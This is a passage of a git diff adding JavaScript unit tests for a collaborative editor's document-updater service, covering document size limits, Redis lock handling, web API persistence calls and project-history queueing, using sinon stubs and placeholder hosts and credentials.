['x'.repeat(1023)], 1024) + expect(result).to.be.false + }) + + it('should return true when the actual character count is above the limit by 1', function () { + const count = this.Limits.docIsTooLarge(2048, ['x'.repeat(1024)], 1024) + expect(count).to.be.true + }) + + it('should return true when the actual character count is above the limit', function () { + const count = this.Limits.docIsTooLarge(2048, ['x'.repeat(2000)], 1024) + expect(count).to.be.true + }) + }) + + describe('when the document has many lines', function () { + it('should return false when the actual character count is below the limit ', function () { + const count = this.Limits.docIsTooLarge( + 2048, + '1234567890'.repeat(100).split('0'), + 1024 + ) + expect(count).to.be.false + }) + + it('should return true when the actual character count is above the limit', function () { + const count = this.Limits.docIsTooLarge( + 2048, + '1234567890'.repeat(2000).split('0'), + 1024 + ) + expect(count).to.be.true + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/LockManager/CheckingTheLock.js b/services/document-updater/test/unit/js/LockManager/CheckingTheLock.js new file mode 100644 index 0000000..575ed90 --- /dev/null +++ b/services/document-updater/test/unit/js/LockManager/CheckingTheLock.js @@ -0,0 +1,65 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const assert = require('node:assert') +const path = require('node:path') +const modulePath = path.join(__dirname, '../../../../app/js/LockManager.js') +const projectId = 1234 +const docId = 5678 +const blockingKey = `Blocking:${docId}` +const SandboxedModule = require('sandboxed-module') + +describe('LockManager - checking the lock', function () { + let Profiler + const existsStub = sinon.stub() + + const mocks = { + '@overleaf/redis-wrapper': { + createClient() { + return { + auth() {}, + exists: existsStub, + } + }, + }, + '@overleaf/metrics': { inc() {} }, + './Profiler': (Profiler = (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.log = sinon.stub().returns({ end: sinon.stub() }) + this.prototype.end = sinon.stub() + } + } + Profiler.initClass() + return Profiler + })()), + } + const LockManager = SandboxedModule.require(modulePath, { requires: mocks }) + + it('should return true if the key does not exists', function (done) { + existsStub.yields(null, '0') + return LockManager.checkLock(docId, (err, free) => { + if (err) return done(err) + free.should.equal(true) + return done() + }) + }) + + return it('should return false if the key does exists', function (done) { + existsStub.yields(null, '1') + return LockManager.checkLock(docId, (err, free) => { + if (err) return done(err) + free.should.equal(false) + return done() + }) + }) +}) diff --git a/services/document-updater/test/unit/js/LockManager/ReleasingTheLock.js b/services/document-updater/test/unit/js/LockManager/ReleasingTheLock.js new file mode 100644 index 0000000..a39a3b4 --- /dev/null +++ b/services/document-updater/test/unit/js/LockManager/ReleasingTheLock.js @@ -0,0 +1,94 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const assert = require('node:assert') +const path = require('node:path') +const modulePath = path.join(__dirname, '../../../../app/js/LockManager.js') +const projectId = 1234 +const docId = 5678 +const SandboxedModule = require('sandboxed-module') + +describe('LockManager - releasing the lock', function () { + beforeEach(function () { + let Profiler + this.client = { + auth() {}, + eval: sinon.stub(), + } + const mocks = { + '@overleaf/redis-wrapper': { + createClient: () => this.client, + }, + '@overleaf/settings': { + redis: { + lock: { + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:${docId}` + }, + }, + }, + }, + }, + '@overleaf/metrics': { inc() {} }, + './Profiler': (Profiler = (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.log = sinon.stub().returns({ end: sinon.stub() }) + this.prototype.end = sinon.stub() + } + } + Profiler.initClass() + return Profiler + })()), + } + this.LockManager = SandboxedModule.require(modulePath, { requires: mocks }) + this.lockValue = 'lock-value-stub' + return (this.callback = sinon.stub()) + }) + + describe('when the lock is current', function () { + beforeEach(function () { + this.client.eval = sinon.stub().yields(null, 1) + return this.LockManager.releaseLock(docId, this.lockValue, this.callback) + }) + + it('should clear the data from redis', function () { + return this.client.eval + .calledWith( + this.LockManager.unlockScript, + 1, + `Blocking:${docId}`, + this.lockValue + ) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('when the lock has expired', function () { + beforeEach(function () { + this.client.eval = sinon.stub().yields(null, 0) + return this.LockManager.releaseLock(docId, this.lockValue, this.callback) + }) + + return it('should return an error if the lock has expired', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/LockManager/getLockTests.js b/services/document-updater/test/unit/js/LockManager/getLockTests.js new file mode 100644 index 0000000..938c593 --- /dev/null +++ b/services/document-updater/test/unit/js/LockManager/getLockTests.js @@ -0,0 +1,126 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/LockManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('LockManager - getting the lock', function () { + beforeEach(function () { + let Profiler + this.LockManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/redis-wrapper': { + createClient: () => { + return { auth() {} } + }, + }, + '@overleaf/metrics': { inc() {} }, + './Profiler': (Profiler = (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.log = sinon.stub().returns({ end: sinon.stub() }) + this.prototype.end = sinon.stub() + } + } + Profiler.initClass() + return Profiler + })()), + }, + }) + this.callback = sinon.stub() + return (this.doc_id = 'doc-id-123') + }) + + describe('when the lock is not set', function () { + beforeEach(function (done) { + this.lockValue = 'mock-lock-value' + this.LockManager.tryLock = sinon + .stub() + .callsArgWith(1, null, true, this.lockValue) + return this.LockManager.getLock(this.doc_id, (...args) => { + this.callback(...Array.from(args || [])) + return done() + }) + }) + + it('should try to get the lock', function () { + return this.LockManager.tryLock.calledWith(this.doc_id).should.equal(true) + }) + + it('should only need to try once', function () { + return this.LockManager.tryLock.callCount.should.equal(1) + }) + + return it('should return the callback with the lock value', function () { + return this.callback.calledWith(null, this.lockValue).should.equal(true) + }) + }) + + describe('when the lock is initially set', function () { + beforeEach(function (done) { + this.lockValue = 'mock-lock-value' + const startTime = Date.now() + let tries = 0 + this.LockManager.LOCK_TEST_INTERVAL = 5 + this.LockManager.tryLock = (docId, callback) => { + if (callback == null) { + callback = function () {} + } + if (Date.now() - startTime < 20 || tries < 2) { + tries = tries + 1 + return callback(null, false) + } else { + return callback(null, true, this.lockValue) + } + } + sinon.spy(this.LockManager, 'tryLock') + + return this.LockManager.getLock(this.doc_id, (...args) => { + this.callback(...Array.from(args || [])) + return done() + }) + }) + + it('should call tryLock multiple times until free', function () { + return (this.LockManager.tryLock.callCount > 1).should.equal(true) + }) + + return it('should return the callback with the lock value', function () { + return this.callback.calledWith(null, this.lockValue).should.equal(true) + }) + }) + + return describe('when the lock times out', function () { + beforeEach(function (done) { + const time = Date.now() + this.LockManager.MAX_LOCK_WAIT_TIME = 5 + this.LockManager.tryLock = sinon.stub().callsArgWith(1, null, false) + return this.LockManager.getLock(this.doc_id, (...args) => { + this.callback(...Array.from(args || [])) + return done() + }) + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith( + sinon.match + .instanceOf(Error) + .and(sinon.match.has('doc_id', this.doc_id)) + ) + .should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/LockManager/tryLockTests.js b/services/document-updater/test/unit/js/LockManager/tryLockTests.js new file mode 100644 index 0000000..861f733 --- /dev/null +++ b/services/document-updater/test/unit/js/LockManager/tryLockTests.js @@ -0,0 +1,155 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/LockManager.js' +const SandboxedModule = require('sandboxed-module') +const tk = require('timekeeper') + +describe('LockManager - trying the lock', function () { + beforeEach(function () { + let Profiler + this.LockManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/redis-wrapper': { + createClient: () => { + return { + auth() {}, + set: (this.set = sinon.stub()), + } + }, + }, + '@overleaf/metrics': { inc() {} }, + '@overleaf/settings': { + redis: { + lock: { + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:${docId}` + }, + }, + }, + }, + }, + './Profiler': + (this.Profiler = Profiler = + (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.log = sinon + .stub() + .returns({ end: sinon.stub() }) + this.prototype.end = sinon.stub() + } + } + Profiler.initClass() + return Profiler + })()), + }, + }) + + this.callback = sinon.stub() + return (this.doc_id = 'doc-id-123') + }) + + describe('when the lock is not set', function () { + beforeEach(function () { + this.lockValue = 'mock-lock-value' + this.LockManager.randomLock = sinon.stub().returns(this.lockValue) + this.set.callsArgWith(5, null, 'OK') + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + it('should set the lock key with an expiry if it is not set', function () { + return this.set + .calledWith(`Blocking:${this.doc_id}`, this.lockValue, 'EX', 30, 'NX') + .should.equal(true) + }) + + return it('should return the callback with true and the lock value', function () { + return this.callback + .calledWith(null, true, this.lockValue) + .should.equal(true) + }) + }) + + describe('when the lock is already set', function () { + beforeEach(function () { + this.set.callsArgWith(5, null, null) + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + return it('should return the callback with false', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + + return describe('when it takes a long time for redis to set the lock', function () { + beforeEach(function () { + tk.freeze(Date.now()) + this.lockValue = 'mock-lock-value' + this.LockManager.randomLock = sinon.stub().returns(this.lockValue) + this.LockManager.releaseLock = sinon.stub().callsArgWith(2, null) + this.set.callsFake((_key, _v, _ex, _ttl, _nx, cb) => { + tk.freeze(Date.now() + 7000) + cb(null, 'OK') + }) + }) + after(function () { + tk.reset() + }) + + describe('in all cases', function () { + beforeEach(function () { + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + it('should set the lock key with an expiry if it is not set', function () { + return this.set + .calledWith(`Blocking:${this.doc_id}`, this.lockValue, 'EX', 30, 'NX') + .should.equal(true) + }) + + return it('should try to release the lock', function () { + return this.LockManager.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + }) + + describe('if the lock is released successfully', function () { + beforeEach(function () { + this.LockManager.releaseLock = sinon.stub().callsArgWith(2, null) + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + return it('should return the callback with false', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + + return describe('if the lock has already timed out', function () { + beforeEach(function () { + this.LockManager.releaseLock = sinon + .stub() + .callsArgWith(2, new Error('tried to release timed out lock')) + return this.LockManager.tryLock(this.doc_id, this.callback) + }) + + return it('should return the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/PersistenceManager/PersistenceManagerTests.js b/services/document-updater/test/unit/js/PersistenceManager/PersistenceManagerTests.js new file mode 100644 index 0000000..8c82677 --- /dev/null +++ b/services/document-updater/test/unit/js/PersistenceManager/PersistenceManagerTests.js @@ -0,0 +1,524 @@ +const sinon = require('sinon') +const modulePath = '../../../../app/js/PersistenceManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') + +describe('PersistenceManager', function () { + beforeEach(function () { + this.request = sinon.stub() + this.request.defaults = () => this.request + this.Metrics = { + Timer: class Timer {}, + inc: sinon.stub(), + } + this.Metrics.Timer.prototype.done = sinon.stub() + this.Settings = {} + + this.PersistenceManager = SandboxedModule.require(modulePath, { + requires: { + requestretry: this.request, + '@overleaf/settings': this.Settings, + './Metrics': this.Metrics, + './Errors': Errors, + }, + }) + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.doc_id = 'doc-id-123' + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.callback = sinon.stub() + this.ranges = { comments: 'mock', entries: 'mock' } + this.pathname = '/a/b/c.tex' + this.lastUpdatedAt = Date.now() + this.lastUpdatedBy = 'last-author-id' + this.historyRangesSupport = false + this.Settings.apis = { + web: { + url: (this.url = 'www.example.com'), + user: (this.user = 'overleaf'), + pass: (this.pass = 'password'), + }, + } + }) + + describe('getDoc', function () { + beforeEach(function () { + this.webResponse = { + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: this.historyRangesSupport, + } + }) + + describe('with a successful response from the web api', function () { + beforeEach(function () { + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should call the web api', function () { + this.request + .calledWith({ + url: `${this.url}/project/${this.project_id}/doc/${this.doc_id}`, + method: 'GET', + headers: { + accept: 'application/json', + }, + auth: { + user: this.user, + pass: this.pass, + sendImmediately: true, + }, + jar: false, + timeout: 5000, + }) + .should.equal(true) + }) + + it('should call the callback with the doc lines, version and ranges', function () { + this.callback + .calledWith( + null, + this.lines, + this.version, + this.ranges, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport + ) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 200 }) + .should.equal(true) + }) + }) + + describe('with the peek option', function () { + beforeEach(function () { + this.request.yields( + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + { peek: true }, + this.callback + ) + }) + + it('should call the web api with a peek param', function () { + this.request + .calledWith({ + url: `${this.url}/project/${this.project_id}/doc/${this.doc_id}`, + qs: { peek: 'true' }, + method: 'GET', + headers: { + accept: 'application/json', + }, + auth: { + user: this.user, + pass: this.pass, + sendImmediately: true, + }, + jar: false, + timeout: 5000, + }) + .should.equal(true) + }) + }) + + describe('when request returns an error', function () { + beforeEach(function () { + this.error = new Error('oops') + this.error.code = 'EOOPS' + this.request.callsArgWith(1, this.error, null, null) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return a generic connection error', function () { + this.callback + .calledWith( + sinon.match + .instanceOf(Error) + .and(sinon.match.has('message', 'error connecting to web API')) + ) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 'EOOPS' }) + .should.equal(true) + }) + }) + + describe('when the request returns 404', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 404 }, '') + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return a NotFoundError', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 404 }) + .should.equal(true) + }) + }) + + describe('when the request returns 413', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 413 }, '') + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return a FileTooLargeError', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.FileTooLargeError)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 413 }) + .should.equal(true) + }) + }) + + describe('when the request returns an error status code', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 500 }, '') + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('getDoc', 1, { status: 500 }) + .should.equal(true) + }) + }) + + describe('when request returns an doc without lines', function () { + beforeEach(function () { + delete this.webResponse.lines + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return and error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('when request returns an doc without a version', function () { + beforeEach(function () { + delete this.webResponse.version + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return and error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('when request returns an doc without a pathname', function () { + beforeEach(function () { + delete this.webResponse.pathname + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + JSON.stringify(this.webResponse) + ) + this.PersistenceManager.getDoc( + this.project_id, + this.doc_id, + this.callback + ) + }) + + it('should return and error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) + + describe('setDoc', function () { + describe('with a successful response from the web api', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 200 }) + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should call the web api', function () { + this.request + .calledWith({ + url: `${this.url}/project/${this.project_id}/doc/${this.doc_id}`, + json: { + lines: this.lines, + version: this.version, + ranges: this.ranges, + lastUpdatedAt: this.lastUpdatedAt, + lastUpdatedBy: this.lastUpdatedBy, + }, + method: 'POST', + auth: { + user: this.user, + pass: this.pass, + sendImmediately: true, + }, + jar: false, + timeout: 5000, + }) + .should.equal(true) + }) + + it('should call the callback without error', function () { + this.callback.calledWith(null).should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 200 }) + .should.equal(true) + }) + }) + + describe('when request returns an error', function () { + beforeEach(function () { + this.error = new Error('oops') + this.error.code = 'EOOPS' + this.request.callsArgWith(1, this.error, null, null) + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should return a generic connection error', function () { + this.callback + .calledWith( + sinon.match + .instanceOf(Error) + .and(sinon.match.has('message', 'error connecting to web API')) + ) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 'EOOPS' }) + .should.equal(true) + }) + }) + + describe('when the request returns 404', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 404 }, '') + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should return a NotFoundError', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 404 }) + .should.equal(true) + }) + }) + + describe('when the request returns 413', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 413 }, '') + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should return a FileTooLargeError', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.FileTooLargeError)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 413 }) + .should.equal(true) + }) + }) + + describe('when the request returns an error status code', function () { + beforeEach(function () { + this.request.callsArgWith(1, null, { statusCode: 500 }, '') + this.PersistenceManager.setDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.callback + ) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + + it('should increment the metric', function () { + this.Metrics.inc + .calledWith('setDoc', 1, { status: 500 }) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectHistoryRedisManager/ProjectHistoryRedisManagerTests.js b/services/document-updater/test/unit/js/ProjectHistoryRedisManager/ProjectHistoryRedisManagerTests.js new file mode 100644 index 0000000..760385b --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectHistoryRedisManager/ProjectHistoryRedisManagerTests.js @@ -0,0 +1,610 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/ProjectHistoryRedisManager.js' +const SandboxedModule = require('sandboxed-module') +const tk = require('timekeeper') + +describe('ProjectHistoryRedisManager', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.user_id = 'user-id-123' + this.rclient = {} + this.source = 'editor' + tk.freeze(new Date()) + + this.Limits = { + docIsTooLarge: sinon.stub().returns(false), + } + + this.ProjectHistoryRedisManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = { + max_doc_length: 123, + redis: { + project_history: { + key_schema: { + projectHistoryOps({ project_id: projectId }) { + return `ProjectHistory:Ops:${projectId}` + }, + projectHistoryFirstOpTimestamp({ project_id: projectId }) { + return `ProjectHistory:FirstOpTimestamp:${projectId}` + }, + }, + }, + }, + }), + '@overleaf/redis-wrapper': { + createClient: () => this.rclient, + }, + './Metrics': (this.metrics = { summary: sinon.stub() }), + './Limits': this.Limits, + }, + }) + }) + + afterEach(function () { + tk.reset() + }) + + describe('queueOps', function () { + beforeEach(async function () { + this.ops = ['mock-op-1', 'mock-op-2'] + this.multi = { exec: sinon.stub().resolves([1]) } + this.multi.rpush = sinon.stub() + this.multi.setnx = sinon.stub() + this.rclient.multi = () => this.multi + await this.ProjectHistoryRedisManager.promises.queueOps( + this.project_id, + ...this.ops + ) + }) + + it('should queue an update', function () { + this.multi.rpush + .calledWithExactly( + `ProjectHistory:Ops:${this.project_id}`, + this.ops[0], + this.ops[1] + ) + .should.equal(true) + }) + + it('should set the queue timestamp if not present', function () { + this.multi.setnx + .calledWithExactly( + `ProjectHistory:FirstOpTimestamp:${this.project_id}`, + Date.now() + ) + .should.equal(true) + }) + }) + + describe('queueRenameEntity', function () { + beforeEach(async function () { + this.file_id = 1234 + + this.rawUpdate = { + pathname: (this.pathname = '/old'), + newPathname: (this.newPathname = '/new'), + version: (this.version = 2), + } + + this.ProjectHistoryRedisManager.promises.queueOps = sinon + .stub() + .resolves() + await this.ProjectHistoryRedisManager.promises.queueRenameEntity( + this.project_id, + this.projectHistoryId, + 'file', + this.file_id, + this.user_id, + this.rawUpdate, + this.source + ) + }) + + it('should queue an update', function () { + const update = { + pathname: this.pathname, + new_pathname: this.newPathname, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + file: this.file_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + }) + + describe('queueAddEntity', function () { + beforeEach(function () { + this.doc_id = 1234 + + this.rawUpdate = { + pathname: (this.pathname = '/old'), + docLines: (this.docLines = 'a\nb'), + version: (this.version = 2), + } + + this.ProjectHistoryRedisManager.promises.queueOps = sinon + .stub() + .resolves() + }) + + it('should queue an update', async function () { + this.rawUpdate.url = this.url = 'filestore.example.com' + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + url: this.url, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + + it('should queue an update with file metadata', async function () { + const metadata = { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'references-provider', + } + const projectId = 'project-id' + const fileId = 'file-id' + const url = `http://filestore/project/${projectId}/file/${fileId}` + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + projectId, + this.projectHistoryId, + 'file', + fileId, + this.user_id, + { + pathname: 'foo.png', + url, + version: 42, + hash: '1337', + metadata, + }, + this.source + ) + + const update = { + pathname: 'foo.png', + docLines: undefined, + url, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: 42, + hash: '1337', + metadata, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + file: fileId, + } + + expect( + this.ProjectHistoryRedisManager.promises.queueOps.args[0][1] + ).to.equal(JSON.stringify(update)) + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWithExactly( + projectId, + JSON.stringify(update) + ) + }) + + it('should forward history compatible ranges if history ranges support is enabled', async function () { + this.rawUpdate.historyRangesSupport = true + this.docLines = 'the quick fox jumps over the lazy dog' + + const ranges = { + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { ts: '2024-01-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 9, d: ' brown' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 14, i: 'jumps' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + ], + comments: [ + { + op: { p: 29, c: 'lazy', t: 'comment-1' }, + metadata: { resolved: false }, + }, + ], + } + this.rawUpdate.ranges = ranges + this.rawUpdate.docLines = this.docLines + + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const historyCompatibleRanges = { + comments: [ + { + op: { p: 29, c: 'lazy', t: 'comment-1', hpos: 35 }, + metadata: { resolved: false }, + }, + ], + changes: [ + { + op: { p: 4, i: 'quick' }, + metadata: { ts: '2024-01-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 9, d: ' brown' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 14, i: 'jumps', hpos: 20 }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + ], + } + + const update = { + pathname: this.pathname, + docLines: 'the quick brown fox jumps over the lazy dog', + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + ranges: historyCompatibleRanges, + doc: this.doc_id, + } + + expect( + this.ProjectHistoryRedisManager.promises.queueOps + ).to.have.been.calledWithExactly(this.project_id, JSON.stringify(update)) + }) + + it('should not forward ranges if history ranges support is disabled', async function () { + this.rawUpdate.historyRangesSupport = false + + const ranges = { + changes: [ + { + op: { p: 0, i: 'foo' }, + metadata: { ts: '2024-01-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 7, d: ' baz' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + ], + comments: [ + { + op: { p: 4, c: 'bar', t: 'comment-1' }, + metadata: { resolved: false }, + }, + ], + } + this.rawUpdate.ranges = ranges + + await this.ProjectHistoryRedisManager.promises.queueAddEntity( + this.project_id, + this.projectHistoryId, + 'doc', + this.doc_id, + this.user_id, + this.rawUpdate, + this.source + ) + + const update = { + pathname: this.pathname, + docLines: this.docLines, + meta: { + user_id: this.user_id, + ts: new Date(), + source: this.source, + }, + version: this.version, + projectHistoryId: this.projectHistoryId, + createdBlob: false, + doc: this.doc_id, + } + + this.ProjectHistoryRedisManager.promises.queueOps + .calledWithExactly(this.project_id, JSON.stringify(update)) + .should.equal(true) + }) + + it('should not forward ranges if history ranges support is undefined', async function () { + this.rawUpdate.historyRangesSupport = false + + const ranges = { + changes: [ + { + op: { p: 0, i: 'foo' }, + metadata: { ts: '2024-01-01T00:00:00.000Z', user_id: 'user-1' }, + }, + { + op: { p: 7, d: ' baz' }, + metadata: { ts: '2024-02-01T00:00:00.000Z', user_id: 'user-1' }, + }, + ], + comments: [ + { + op: { p: 4, c: 'bar', t: 'comment-1' }, + metadata: { resolved: false }, + }, + ], 